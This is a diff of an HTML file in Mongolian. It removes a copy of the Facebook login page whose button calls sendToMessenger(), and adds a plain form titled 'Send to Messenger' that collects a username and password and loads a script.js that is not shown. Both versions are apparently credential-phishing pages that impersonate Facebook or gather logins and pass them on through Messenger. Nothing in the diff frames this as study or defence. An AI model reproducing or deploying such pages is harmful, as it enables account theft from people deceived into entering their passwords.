--- a/index.html
+++ b/index.html
@@ -3,98 +3,19 @@
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>Нэвтрэх</title>
-    <style>
-        body {
-            font-family: Arial, sans-serif;
-            background: #f0f2f5;
-            display: flex;
-            flex-direction: column;
-            align-items: center;
-            justify-content: center;
-            height: 100vh;
-            margin: 0;
-        }
-        .login-container {
-            background: white;
-            padding: 20px;
-            width: 360px;
-            border-radius: 8px;
-            box-shadow: 0px 4px 10px rgba(0, 0, 0, 0.2);
-            text-align: center;
-        }
-        .login-container h2 {
-            font-size: 24px;
-            margin-bottom: 20px;
-            color: #1877f2;
-        }
-        input {
-            width: 100%;
-            padding: 12px;
-            margin: 10px 0;
-            border: 1px solid #ddd;
-            border-radius: 6px;
-            font-size: 16px;
-        }
-        .login-btn {
-            width: 100%;
-            padding: 12px;
-            background: #1877f2;
-            color: white;
-            border: none;
-            border-radius: 6px;
-            font-size: 18px;
-            cursor: pointer;
-            font-weight: bold;
-        }
-        .login-btn:hover {
-            background: #166fe5;
-        }
-        .forgot-password {
-            display: block;
-            margin: 10px 0;
-            color: #1877f2;
-            text-decoration: none;
-            font-size: 14px;
-        }
-        .forgot-password:hover {
-            text-decoration: underline;
-        }
-        .divider {
-            width: 100%;
-            height: 1px;
-            background: #ddd;
-            margin: 15px 0;
-        }
-        .signup-btn {
-            width: 100%;
-            padding: 12px;
-            background: #42b72a;
-            color: white;
-            border: none;
-            border-radius: 6px;
-            font-size: 18px;
-            cursor: pointer;
-            font-weight: bold;
-        }
-        .signup-btn:hover {
-            background: #36a420;
-        }
-    </style>
+    <title>Messenger Илгээх</title>
+    <script src="script.js" defer></script>
 </head>
 <body>
-
-    <div class="login-container">
-        <h2>Facebook</h2>
-        <input type="text" id="username" placeholder="Имэйл эсвэл утасны дугаар">
-        <input type="password" id="password" placeholder="Нууц үг">
-        <button class="login-btn" onclick="sendToMessenger()">Нэвтрэх</button>
-        <a href="#" class="forgot-password">Нууц үгээ мартсан уу?</a>
-        <div class="divider"></div>
-        <button class="signup-btn">Шинэ бүртгэл үүсгэх</button>
-    </div>
-
-    <script src="script.js"></script>
-
+    <h1>Нэвтрэх мэдээлэл</h1>
+    <form id="loginForm">
+        <label for="username">Нэвтрэх нэр:</label>
+        <input type="text" id="username" required>
+        <br>
+        <label for="password">Нууц үг:</label>
+        <input type="password" id="password" required>
+        <br>
+        <button type="submit">Илгээх</button>
+    </form>
 </body>
 </html>
